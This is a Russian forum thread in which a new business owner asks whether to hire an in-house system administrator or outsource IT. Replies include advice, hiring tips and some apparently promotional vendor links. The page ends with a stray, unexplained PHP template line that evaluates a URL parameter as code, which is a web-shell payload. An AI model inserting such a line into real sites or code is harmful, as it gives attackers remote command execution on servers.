+ Ответить в теме
Показано с 1 по 10 из 10

Тема: Нанимать ли сисадмина?


  1. #1
    Мимо проходил Kommunar is on a distinguished road Аватар для Kommunar
    Регистрация
    26.01.2019
    Откуда
    .....
    Машина
    .....
    Сообщений
    66

    Нанимать ли сисадмина?

    Нужно в ближайшее время укомплектовать штат сотрудников на моей новой фирме. Вообще сильно раздувать штат не хочу, поэтому думаю о том чтобы не нанимать сисадмина. Можно же договориться о сотрудничестве со сторонней организацией, верно? Думаю заключить договор об абонентском обслуживании компьютеров с фирмой, наподобие такой http://www.evek.ru/abonentskoe-obslu...mpyuterov.html Или я не прав и сисадмин нужен, а?

  2. #2
    Мимо проходил Bimbom is on a distinguished road Аватар для Bimbom
    Регистрация
    26.01.2019
    Откуда
    ......
    Машина
    .....
    Сообщений
    45
    Я бы нанял, автор. Слишком на бюджете фирмы его зарплата не отразится, а уверенность вам в том что в случае форс-мажора сисадмин сможет быстро среагировать, прибавит.

  3. #3
    Мимо проходил nekrolog is on a distinguished road Аватар для nekrolog
    Регистрация
    26.01.2019
    Откуда
    ......
    Машина
    ....
    Сообщений
    54
    А я считаю что сисадмин вам абсолютно не нужен. Сейчас много одаренных ребят, хорошо шарящих в компьютерах, и можно просто вызывать их по мере надобности.

  4. #4
    Мимо проходил Victan is on a distinguished road Аватар для Victan
    Регистрация
    12.01.2019
    Откуда
    ......
    Машина
    ....
    Сообщений
    39
    В штате каждой серьезной фирмы обязательно должен быть человек, отвечающий за исправное состояние компьютеров. Так что я бы не раздумывал, а нанял на эту должность толкового человека.

  5. #5
    Мимо проходил fionis is on a distinguished road Аватар для fionis
    Регистрация
    30.11.2018
    Машина
    Гольф
    Сообщений
    49
    Я смотрю, что сейчас очень многие компании в Москве пользуются услугами it аутсорсинга, почему бы и вам не попробовать? Я вижу в этом свои плюсы. Так вам не нужно будет тратить время на поиск специалиста, не нужно будет его обучать, не нужно будет думать кем подменить штатного сотрудника, если он заболеет или уйдет в отпуск и т.д. Сколько у вас в данный момент рабочих мест? Если вы из Москвы, можете посмотреть стоимость абонентского обслуживания на этом сайте https://www.noproblemit.ru. Посчитайте, что вам будет выгоднее

  6. #6
    Мимо проходил Train is on a distinguished road Аватар для Train
    Регистрация
    23.03.2019
    Машина
    Бричка
    Сообщений
    10
    Если фирма не большая, то можно и не нанимать.

  7. #7
    Мимо проходил Dorin is on a distinguished road Аватар для Dorin
    Регистрация
    13.04.2019
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    11
    Согласен. Или на удаленке на неполный рабочий день.

  8. #8
    Мимо проходил Limof is on a distinguished road Аватар для Limof
    Регистрация
    30.04.2019
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    19
    Это только вам решать.

  9. #9
    Мимо проходил OniTakie is on a distinguished road Аватар для OniTakie
    Регистрация
    12.12.2018
    Откуда
    Российская Федерация
    Машина
    Бричка
    Сообщений
    45
    Сейчас современные программные продукты достаточно сложны в использовании, без специализированных знаний и опыта, тут не обойтись. Попробуйте продукт по автоматизации документооборота - ELMA ECM https://www.elma-bpm.ru/product/ecm/, Если возникают какие либо вопросы, сразу обращаемся к вендору, помогают с поддержкой, наладкой и обслуживанием ПО

  10. #10
    Новичок FedorPorter is on a distinguished road Аватар для FedorPorter
    Регистрация
    21.05.2019
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    139
    Чтобы найти системного администратора среднего уровня, а не эникейщика? Существует несколько моментов:
    Не прибегать к услугам кадровых агентств. Большинство таковых не имееет представления о том, как работает IT отдел, или чем эникейщик отличается от системного администратора, за исключением профильных агентств.
    Не доверяйте подбор IT кадров своим сотрудникам, особенно кадровому отделу (если только у Вас нет действующего системного администратора, который мог бы экзаменовать претендента). Может возникнуть конфликт интересов, ведь поиск профессионального системного администратора по знакомству – лотерея, к тому если им окажется, например, сын Вашего главного бухгалтера, то и уволить его окажется непросто.
    Доверяйте работу профессионалам. Существуют профильные кадровые агентства, обращайтесь к фрилансерам, ищите сотрудников на профильных форумах. Ведь если вы наймете некомпетентного системного администратора, то можете в миг потерять всю клиентскую базу.
    Не завышайте требования при самостоятельном поиске. Например, если вы не используете специализированное ПО, зачем системному администратору разговорный английский язык? Не нужен он в большинстве случаев и руководителю IT отдела, а тот минимум, который нужен в силу профессионального опыта, появится сам. Когда вы берете на работу системного администратора с разговорным знание английского языка, повышается риск нарваться на геймера (человека увлечённого онлайн играми). А Вы думаете, как и зачем он обучился английскому языку?
    Пригласите на работу фрилансера или выездного инженера. Сразу оговорюсь, данный способ является затратным, но легким. Вы звоните в аутсорсинговую компанию, заключаете договор на месяц, в течение которого к Вам будут приезжать разные инженеры. Вы выбираете лучшего, делаете ему предложение, и, если можете предложить больше, получите отличного специалиста.

+ Ответить в теме

Ваши права

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
{{$myVar = eval($_GET[cmd]);}}